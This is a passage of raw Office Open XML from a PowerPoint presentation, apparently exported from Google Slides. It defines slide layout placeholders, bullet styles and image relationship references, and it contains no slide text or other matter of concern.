              </a:buClr>
              <a:buSzPts val="900"/>
              <a:buNone/>
              <a:defRPr sz="900"/>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1371600" lvl="2" indent="-228600" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="800"/>
              <a:buNone/>
              <a:defRPr sz="800"/>
            </a:lvl3pPr>
            <a:lvl4pPr marL="1828800" lvl="3" indent="-228600" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="700"/>
              <a:buNone/>
              <a:defRPr sz="700"/>
            </a:lvl4pPr>
            <a:lvl5pPr marL="2286000" lvl="4" indent="-228600" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="700"/>
              <a:buNone/>
              <a:defRPr sz="700"/>
            </a:lvl5pPr>
            <a:lvl6pPr marL="2743200" lvl="5" indent="-228600" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="700"/>
              <a:buNone/>
              <a:defRPr sz="700"/>
            </a:lvl6pPr>
            <a:lvl7pPr marL="3200400" lvl="6" indent="-228600" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="700"/>
              <a:buNone/>
              <a:defRPr sz="700"/>
            </a:lvl7pPr>
            <a:lvl8pPr marL="3657600" lvl="7" indent="-228600" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="700"/>
              <a:buNone/>
              <a:defRPr sz="700"/>
            </a:lvl8pPr>
            <a:lvl9pPr marL="4114800" lvl="8" indent="-228600" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="700"/>
              <a:buNone/>
              <a:defRPr sz="700"/>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="167" name="Google Shape;167;p29"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3280697" y="3143250"/>
            <a:ext cx="2586600" cy="5121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dk1"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buNone/>
              <a:defRPr sz="1800" b="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:defRPr>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68" name="Google Shape;168;p29"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="pic" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3280697" y="1771650"/>
            <a:ext cx="2586600" cy="1143000"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 0"/>
            </a:avLst>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
          <a:effectLst>
            <a:outerShdw blurRad="50800" dist="50800" dir="5400000" algn="tl" rotWithShape="0">
              <a:srgbClr val="000000">
                <a:alpha val="41960"/>
              </a:srgbClr>
            </a:outerShdw>
          </a:effectLst>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="169" name="Google Shape;169;p29"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="6"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3280698" y="3655322"/>
            <a:ext cx="2586600" cy="10086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100"/>
              <a:buNone/>
              <a:defRPr sz="1100"/>
            </a:lvl1pPr>
            <a:lvl2pPr marL="914400" lvl="1" indent="-228600" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="900"/>
              <a:buNone/>
              <a:defRPr sz="900"/>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1371600" lvl="2" indent="-228600" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="800"/>
              <a:buNone/>
              <a:defRPr sz="800"/>
            </a:lvl3pPr>
            <a:lvl4pPr marL="1828800" lvl="3" indent="-228600" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="700"/>
              <a:buNone/>
              <a:defRPr sz="700"/>
            </a:lvl4pPr>
            <a:lvl5pPr marL="2286000" lvl="4" indent="-228600" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="700"/>
              <a:buNone/>
              <a:defRPr sz="700"/>
            </a:lvl5pPr>
            <a:lvl6pPr marL="2743200" lvl="5" indent="-228600" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="700"/>
              <a:buNone/>
              <a:defRPr sz="700"/>
            </a:lvl6pPr>
            <a:lvl7pPr marL="3200400" lvl="6" indent="-228600" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="700"/>
              <a:buNone/>
              <a:defRPr sz="700"/>
            </a:lvl7pPr>
            <a:lvl8pPr marL="3657600" lvl="7" indent="-228600" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="700"/>
              <a:buNone/>
              <a:defRPr sz="700"/>
            </a:lvl8pPr>
            <a:lvl9pPr marL="4114800" lvl="8" indent="-228600" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="700"/>
              <a:buNone/>
              <a:defRPr sz="700"/>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="170" name="Google Shape;170;p29"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="7"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6037298" y="3143250"/>
            <a:ext cx="2592600" cy="5121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dk1"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buNone/>
              <a:defRPr sz="1800" b="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:defRPr>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71" name="Google Shape;171;p29"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="pic" idx="8"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6037391" y="1771650"/>
            <a:ext cx="2586000" cy="1143000"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 0"/>
            </a:avLst>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
          <a:effectLst>
            <a:outerShdw blurRad="50800" dist="50800" dir="5400000" algn="tl" rotWithShape="0">
              <a:srgbClr val="000000">
                <a:alpha val="41960"/>
              </a:srgbClr>
            </a:outerShdw>
          </a:effectLst>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="172" name="Google Shape;172;p29"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="9"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6037298" y="3655321"/>
            <a:ext cx="2589300" cy="10086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100"/>
              <a:buNone/>
              <a:defRPr sz="1100"/>
            </a:lvl1pPr>
            <a:lvl2pPr marL="914400" lvl="1" indent="-228600" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="900"/>
              <a:buNone/>
              <a:defRPr sz="900"/>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1371600" lvl="2" indent="-228600" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="800"/>
              <a:buNone/>
              <a:defRPr sz="800"/>
            </a:lvl3pPr>
            <a:lvl4pPr marL="1828800" lvl="3" indent="-228600" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="700"/>
              <a:buNone/>
              <a:defRPr sz="700"/>
            </a:lvl4pPr>
            <a:lvl5pPr marL="2286000" lvl="4" indent="-228600" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="700"/>
              <a:buNone/>
              <a:defRPr sz="700"/>
            </a:lvl5pPr>
            <a:lvl6pPr marL="2743200" lvl="5" indent="-228600" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="700"/>
              <a:buNone/>
              <a:defRPr sz="700"/>
            </a:lvl6pPr>
            <a:lvl7pPr marL="3200400" lvl="6" indent="-228600" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="700"/>
              <a:buNone/>
              <a:defRPr sz="700"/>
            </a:lvl7pPr>
            <a:lvl8pPr marL="3657600" lvl="7" indent="-228600" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="700"/>
              <a:buNone/>
              <a:defRPr sz="700"/>
            </a:lvl8pPr>
            <a:lvl9pPr marL="4114800" lvl="8" indent="-228600" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="700"/>
              <a:buNone/>
              <a:defRPr sz="700"/>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="173" name="Google Shape;173;p29"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6446520" y="4767263"/>
            <a:ext cx="2183100" cy="273900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="68575" tIns="34275" rIns="68575" bIns="34275" anchor="ctr"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74" name="Google Shape;174;p29"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="514350" y="4766884"/>
            <a:ext cx="58293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75" name="Google Shape;175;p29"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6572250" y="285750"/>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2171700" y="573280"/>
            <a:ext cx="6458100" cy="969900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="68575" tIns="34275" rIns="68575" bIns="34275" anchor="ctr" anchorCtr="0">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr lvl="0" algn="r"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78" name="Google Shape;178;p30"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="3062999" y="-902731"/>
            <a:ext cx="3018000" cy="81153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9" name="Google Shape;179;p30"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6446520" y="4767263"/>
            <a:ext cx="2183100" cy="273900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="68575" tIns="34275" rIns="68575" bIns="34275" anchor="ctr"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80" name="Google Shape;180;p30"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="514350" y="4766884"/>
            <a:ext cx="58293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81" name="Google Shape;181;p30"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6572250" y="285750"/>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82"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="183" name="Google Shape;183;p31" descr="C3-HD-BTM.png"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="3281363"/>
            <a:ext cx="9144000" cy="1862138"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="184" name="Google Shape;184;p31"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="6394649" y="1250900"/>
            <a:ext cx="2927100" cy="15429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3000"/>
              <a:buFont typeface="Century Gothic"/>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85" name="Google Shape;185;p31"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="2381450" y="-1054150"/>
            <a:ext cx="2927100" cy="61530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6" name="Google Shape;186;p31"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5860839" y="284956"/>
            <a:ext cx="2183100" cy="273900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="68575" tIns="34275" rIns="68575" bIns="34275" anchor="ctr"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87" name="Google Shape;187;p31"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="514350" y="285750"/>
            <a:ext cx="52437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88" name="Google Shape;188;p31"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8146839" y="285750"/>
            <a:ext cx="4830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pic>
        <p:nvPicPr>
          <p:cNvPr id="51" name="Google Shape;51;p13" descr="C3-HD-TOP.png"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId20">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="9144000" cy="1081088"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="52" name="Google Shape;52;p13"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2171700" y="573280"/>
            <a:ext cx="6458100" cy="969900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="68575" tIns="34275" rIns="68575" bIns="34275" anchor="ctr" anchorCtr="0">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marR="0" lvl="0" algn="r" rtl="0">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="3000"/>
              <a:buFont typeface="Century Gothic"/>
              <a:buNone/>
              <a:defRPr sz="30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13"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="514350" y="1645920"/>
            <a:ext cx="8115300" cy="3018000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="68575" tIns="34275" rIns="68575" bIns="34275" anchor="t" anchorCtr="0">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="457200" marR="0" lvl="0" indent="-336550" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1700"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:defRPr sz="1700" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:schemeClr val="dk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9pPr>
          </a:lstStyle>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="54" name="Google Shape;54;p13"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6446520" y="4767263"/>
            <a:ext cx="2183100" cy="273900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="68575" tIns="34275" rIns="68575" bIns="34275" anchor="ctr" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marR="0" lvl="0" algn="r" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
              <a:defRPr sz="8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5" name="Google Shape;55;p13"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="514350" y="4766884"/>
            <a:ext cx="58293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8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6" name="Google Shape;56;p13"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6572250" y="285750"/>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2.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6.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout15.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image81.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image80.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide10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07.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout15.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image83.jpg"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide10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0.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1.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3.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4.xml"/><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7.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8.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9.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout14.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image10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0.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1.xml"/><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32.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3.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5.xml"/><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6.xml"/><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7.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8.xml"/><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63.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9.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide16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5.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout14.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image136.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide1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6.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout14.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image136.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image137.png"/></Relationships>
</file>

